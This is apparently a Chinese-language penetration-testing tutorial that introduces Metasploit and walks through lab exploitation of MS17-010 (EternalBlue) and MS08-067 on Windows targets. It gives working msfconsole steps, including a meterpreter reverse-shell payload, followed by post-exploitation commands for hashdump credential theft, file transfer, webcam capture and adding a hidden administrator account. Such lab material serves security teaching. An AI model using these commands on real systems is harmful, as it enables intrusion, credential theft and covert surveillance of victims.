网络安全学习——渗透测试基础（三）

1. 查看受害者的机器是否存活，可以配合nmap使用Metasploit渗透框架介绍

metasploit是一个免费的可下载的框架，通过它可以很容易得获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞工具。

Metasploit的渗透全过程

搜索公开渗透代码--->编译-->测试-->修改代码-->实施-->失败-->不断调试至成功.

1.情报搜集（内建扫描探测与查点辅助模块；插件机制集成调用nmap、nessus、OpenVAS等开源扫描工具）

2.威胁建模（信息汇总至数据库，提供易用的数据库查询命令帮助对情报进行威胁建模）

3.漏洞分析（提供大量的协议Fuzz测试器与Web应用漏洞探测模块）

4.渗透攻击（利用漏洞成功渗透到目标系统或网络）

5.后渗透攻击（成功渗透攻击并获取目标远程控制程序后，Meterpreter可提供驻内存免杀能力高级后门工具，特权提升、跳板攻击与内网拓展等）

6.报告生成（渗透结果存入数据库，可数据库查询并辅助渗透测试报告的写作）

                                                       MS17—010漏洞攻击

官方描述：https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

漏洞描述：Microsoft Windows SMB Server远程代码执行漏洞

Microsoft Server Message Block 1.0(SMBv1)服务器处理某些请求时，在实现上存在远程代码执行漏洞（RCE），成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败，会导致拒绝服务，对业务造成一定安全风险。

Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等

Metasploitable渗透测试实战：ms17-010

1.查看受害者的机器是否存活，可以配合nmap使用

2.启用msf，命令为：msfconsole

3.搜索漏洞，命令为：search ms17-010

4.使用序号为1的攻击模块：use exploit/windows/smb/ms17_010_eternalblue

5.设置攻击负载：set payload windows/x64/meterpreter/reverse_tcp

6.设置受害者ip（win7）：set rhost 192.168.188.172

7.设置攻击者ip（kali）：set lhost 192.168.188.173

8.查看设置，开始攻击（run exploit ）

通过 meterpreter 获取屏幕快照： screenshot

上传文件到Windows主机：meterpreter > upload /root/csb666.jpg c:\\

从Windows主机中下载文件到kali中：meterpreter > download d:\meishaonv.jpg /root/

查看权限Windows命令为：getuid  Linux命令为：whoami

知道权限的级别，进入shell

8. 后渗透利用

利用刚拿到的shell执行权限提权，通过shell对靶机Win7进行控制
此时我们输入getuid查看权限得知权限为管理员权限
使用shell命令进入window7系统meterpreter > getuidmeterpreter > hashdump

已成功获得windows登录用户名和密码

开启摄像头
webcam_list -->查看摄像头
webcam_snap -->通过摄像头拍照
webcam_stream -->通过摄像头开启视频
键盘监听....

                                                           MS08-067漏洞攻击

官方描述：https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

漏洞描述：
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞
Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，SYSTEM权限执行任意指令。
对于Windows 2000、XP和Server 2003，无需认证便可以利用该漏洞；
对于Windows Vista和Server 2008，可能需要认证。

1. 查看受害者的机器是否存活，可以配合nmap使用

2. 启用msf，命令为: msfconsole

3. 搜索漏洞，命令为: search ms08-067

4. 加载攻击模块和配置攻击信息

5. 开始利用,并返回成功利用的信息

6. 查看权限，Windows命令为：getuid  Linux命令为：whoami

7. 知道权限的级别，进入shell

8. 添加用户帐号命令为：net user 用户 密码 /add

9. 把刚刚创建好的用户添加到管理员组命令：net localgroup administrators 用户 /add

10. 远程登录到XP系统命令为：rdesktop 192.168.2.2

11. 登录到XP系统，打开CMD查看刚刚创建的用户是否添加到管理员组命令为：net localgroup administrators